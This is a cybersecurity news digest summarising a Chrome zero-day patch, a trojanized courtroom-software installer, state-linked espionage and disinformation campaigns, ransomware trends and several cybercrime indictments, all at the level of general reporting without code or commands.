Google fixes Chrome zero-day, CISA adds Apache Flink bug to its KEV catalog

Google has released security updates for its Chrome browser (125.0.6422.112/.113 for Windows, Mac and 125.0.6422.112 for Linux) to address an actively exploited critical flaw. Tracked as CVE-2024-5274, the vulnerability is a type confusion issue in the V8 engine that can lead to remote code execution.

The US Cybersecurity and Infrastructure Security Agency (CISA) has added an Apache Flink bug (CVE-2020-17519) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. If exploited, the vulnerability could be used by a remote hacker as a means to gain access to sensitive information.

A backdoor found in JAVS software

Attackers have compromised the installer for the widely used Justice AV Solutions (JAVS) courtroom video recording software, embedding malware associated with a known backdoor called RustDoor that allows them to take control of compromised systems. JAVS has since removed the affected version from its official website, clarifying that the trojanized software, which included a malicious fffmpeg.exe binary, “did not originate from JAVS or any 3rd party associated with JAVS.”

Cybersecurity firm Rapid7 has published an analysis of the supply chain attack, now tracked as CVE-2024-4978.

China-linked cyber spies target military and gov't entities in the South China Sea region

A previously unknown threat actor, dubbed ‘Unfading Sea Haze’ by Bitdefender, has been targeting military and government entities in the South China Sea region since 2018. The group's operations are aligned with Chinese geopolitical interests, focusing on intelligence collection and espionage. Unfading Sea Haze shares similarities with other Chinese state-sponsored groups, particularly APT41, in terms of tactics, techniques, and tools. The initial access vector used by the group remains unknown, but one identified method of re-access involves spear-phishing emails with malicious archives. These archives contain LNK files disguised as documents that execute malicious commands when opened.

Chinese APTs increasingly using ORB networks to mask attack infrastructure

China-linked threat actors are leveraging Operational Relay Box (ORB) networks to mask their attack infrastructure, according to a new report from Google’s cybersecurity subsidiary Mandiant. The company reports that it is actively monitoring several ORB networks, with the most notable being SPACEHOP and FLORAHOX, used by groups like APT5 and APT31, respectively.

Speaking of Chinese hackers, cybersecurity company Check Point has observed the Chinese cyberespionage group Sharp Panda expanding its operations in Africa and the Caribbean. The new campaign, now tracked as Sharp Dragon, adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like command-and-control (C2) communication and command execution while minimizing the exposure of group’s custom tools.

On the same note, a cyber espionage group linked to China, known as Mustang Panda, has been accused of deploying malware over the past five months to infiltrate computer systems of cargo shipping companies in Norway, Greece, and the Netherlands.

Russia’s DoppelGänger campaign manipulates social media to undermine Western support for Ukraine

Security researchers have uncovered a sophisticated Russian disinformation campaign that has been actively challenging the credibility of journalists and fact-checkers since May 2022. This campaign, leveraging X (formerly Twitter), disseminates disinformation articles while engaging in commenting and sharing activities to provoke further investigation.

The primary objective of the DoppelGänger campaign is to lessen support for Ukraine amidst Russian aggression and to foster divisions within nations that support Ukraine. The campaign has targeted audiences in France, Germany, Ukraine, the United States, and several other countries including the United Kingdom, Lithuania, Switzerland, Slovakia, and Italy. In recent months, disinformation narratives have also targeted Israel, primarily aiming to undermine the United States due to its alliance with Tel Aviv.

A recent investigation by the German publication Correctiv has uncovered that Russian hackers and the disinformation network “Doppelgänger” are using services from the Moldovan company PQ Hosting. This allows them to operate from servers in the Netherlands, evading sanctions and governmental efforts. PQ Hosting, owned by brothers Ivan and Yuri Nekoliti from the unrecognized Transnistrian region, has an office in Chisinau and mainly serves Russian clients despite international sanctions. Ivan Nekoliti acknowledged that Russian users use the company’s EU-based servers to bypass sanctions.

In 2022, Ivan established Stark Industries Solutions Limited in London, which Yuri now runs. This company hides its connections to PQ Hosting, enabling the management of servers in a Dutch data center used by pro-Russian hacker groups such as NoName057(16), the GRU-associated Sandworm and Blue Charlie (engaged in espionage and data theft from Ukraine and NATO countries), and for politically motivated cyber attacks. Notably, PQ Hosting's Dutch servers hosted the RRN site, part of a Russian disinformation network that mimics credible news websites.

In related news, TikTok announced that in the first four months of the year, it disrupted 15 influence operations and removed 3,001 associated accounts. Most networks aimed to influence upcoming elections within their own countries. Only two networks, based in China and Iran, targeted foreign audiences with pro-PRC and anti-US content, respectively. The largest influence networks were located in Serbia, Indonesia, and Venezuela.

Hackers target orgs in Ukraine with SmokeLoader malware

The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) has reported a significant increase in activity from the financially motivated threat actor it tacks as UAC-0006. Since May 20, 2024, the threat actors have launched at least two distinct malware distribution campaigns.

Additionally, CERT-UA has warned of a malicious activity cluster, tracked as UAC-0188, that targets Ukrainian organizations with phishing emails containing a link leading to a .SCR file hosted on Dropbox. Upon execution, SuperOps RMM software is downloaded onto the computer that provides threat actors with remote access to the compromised system.

Iranian Void Manticore continues destructive activities in Israel

Check Point has released a report on Void Manticore, an Iranian threat group affiliated with the Ministry of Intelligence and Security (MOIS), highlighting its activities against Israel. These include destructive wiper attacks targeting Windows and Linux systems, as well as manual file deletions. Void Manticore also engages in influence operations. The report identifies significant overlap in victimology with Scarred Manticore (also known as Storm-861), suggesting collaboration between the groups.

Threat actors are abusing Foxit PDF Reader flaw to deploy multiple malware variants

Multiple threat actors have been exploiting a design flaw in Foxit PDF Reader to distribute a range of malware, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. According to a technical report by Check Point, the flaw involves Foxit PDF Reader's handling of pop-up messages, which prompts users to trust a document before enabling potentially risky features. Initially, users are presented with an “OK” button as the default option in a security warning. If they click “OK,” a second warning appears, with “Open” as the default choice, which then executes additional commands to download and run a malicious payload hosted on Discord's content delivery network (CDN).

SMS scammers are using Amazon, Google and IBM Cloud Services to steal customer data

Security researchers have uncovered malicious campaigns exploiting cloud storage services like Amazon S3, Google Cloud Storage, Backblaze B2, and IBM Cloud Object Storage. These campaigns, orchestrated by unidentified threat actors, aim to redirect users to malicious websites to steal their information via SMS messages. The attackers focus on two main goals: bypassing network firewalls to deliver scam messages undetected and convincing recipients that the messages or links are trustworthy.

The Grandoreiro malware is back up and running after January disruption

The cybercriminals behind the Windows-based Grandoreiro banking trojan have resurfaced with a global phishing campaign, despite a law enforcement takedown in January 2024 aimed at dismantling the group's operations. According to IBM's X-Force, these large-scale phishing attacks that have been ongoing since March 2024, are now targeting over 1,500 banks worldwide, spanning more than 60 countries across Central and South America, Africa, Europe, and the Indo-Pacific region. Previously, Grandoreiro's campaigns were mostly limited to Latin America, Spain, and Portugal.

BloodAlchemy malware is used in attacks on gov’t organizations in Southern and Southeastern Asia

Japanese cybersecurity firm ITOCHU Cyber & Intelligence has a report out on a strain of malware called ‘BloodAlchemy’ used in attacks targeting government organizations in Southern and Southeastern Asia. As it was discovered, BloodAlchemy is actually an updated version of Deed RAT, which is believed to be a successor to ShadowPad.

Researches warn of an increase in ransomware attacks targeting VMware ESXi infrastructure

Sygnia’s Incident Response team has observed a significant rise in ransomware attacks targeting virtualized environments, particularly VMware ESXi infrastructure. The ransomware groups like LockBit, HelloKitty, BlackMatter, RedAlert (N13V), Scattered Spider, Akira, Cactus, BlackCat, and Cheerscrypt frequently exploit this vector, the researchers found.

The typical attack pattern includes:

• Gaining initial access via phishing, malicious downloads, or exploiting vulnerabilities in internet-facing assets.

• Escalating privileges to access ESXi hosts or vCenter credentials through brute-force attacks or other techniques.

• Validating access to the virtualization infrastructure and deploying ransomware.

• Deleting or encrypting backup systems or changing passwords to hinder recovery.

• Exfiltrating data to external locations like Mega.io or Dropbox.

• Executing ransomware to encrypt the "/vmfs/volumes" folder on the ESXi filesystem.

• Spreading ransomware to non-virtualized servers and workstations to expand the attack's impact.

Threat actors exploit vulnerable drivers to disable EDRs in cryptojacking attack

A new cryptojacking campaign is leveraging vulnerable drivers to disable security solutions on Windows systems. The campaign, referred to as “Bring Your Own Vulnerable Driver” (BYOVD), has been attributed to a threat actor tracked as REF4578. It employs a crypto-miner dubbed 'Ghostengine.' The primary objective of REF4578 is to disable Endpoint Detection and Response (EDR) products to avoid detection.

Chinese nationals indicted in 73M сryptocurrency money laundering scheme

Two Chinese nationals have been charged in connection with a sophisticated international money laundering scheme that funneled proceeds from cryptocurrency investment scams. The indictment accuses Daren Li, 41, and Yicheng Zhang, 38, of playing pivotal roles in a network that laundered over $73 million through US financial institutions to accounts in the Bahamas and converted into the cryptocurrency Tether.

A Russian access broker indicted in the US

Evgeniy Doroshenko, a 31-year-old Russian citizen also known as “Eugene Doroshenko,” “FlankerWWH,” and “Flanker,” has been indicted for wire fraud and computer-related fraud. According to court documents, between February 2019 and May 2024, Doroshenko operated as an “access broker,” illegally accessing various computer systems and selling this unauthorized access for profit on a Russian-language cybercrime forum.

The charge of wire fraud carries a maximum penalty of 20 years in prison and a fine of $250,000, or twice the gross amount of gain or loss resulting from the offense, whichever is greater. The charge of computer fraud carries a maximum penalty of five years in prison and a fine of $250,000, or twice the gross amount of gain or loss resulting from the offense, whichever is greater.

A Coinbase scammer pleads guilty

Chirag Tomar, a 30-year-old Indian citizen, admitted his guilt in orchestrating a scheme that stole over $37 million through a spoofing scam involving the Coinbase website. Victims were deceived into entering their login credentials on a fake Coinbase site, enabling fraudsters to access their real accounts. Some were tricked into providing authentication details or allowing remote access to their computers, while others were misled by fraudsters posing as Coinbase customer service representatives to divulge two-factor authentication codes over the phone.

Tomar faces up to 20 years in prison and a $250,000 fine for wire fraud conspiracy, with sentencing yet to be scheduled.

Incognito Market owner arrested in the US, faces life in prison

Rui-Siang Lin, also known as Ruisiang Lin, “Pharoah,” and “faro,” was arrested and charged for allegedly running “Incognito Market,” one of the largest illegal narcotics marketplaces on the dark web. The 23-year-old Taiwanese national faces a series of severe charges that could lead to a lifetime in prison. According to the complaint and indictment, Lin operated Incognito Market since its inception in October 2020 until its closure in March 2023. During this period, the marketplace facilitated the sale of more than $100 million worth of illegal narcotics, including hundreds of kilograms of cocaine and methamphetamines, to users worldwide.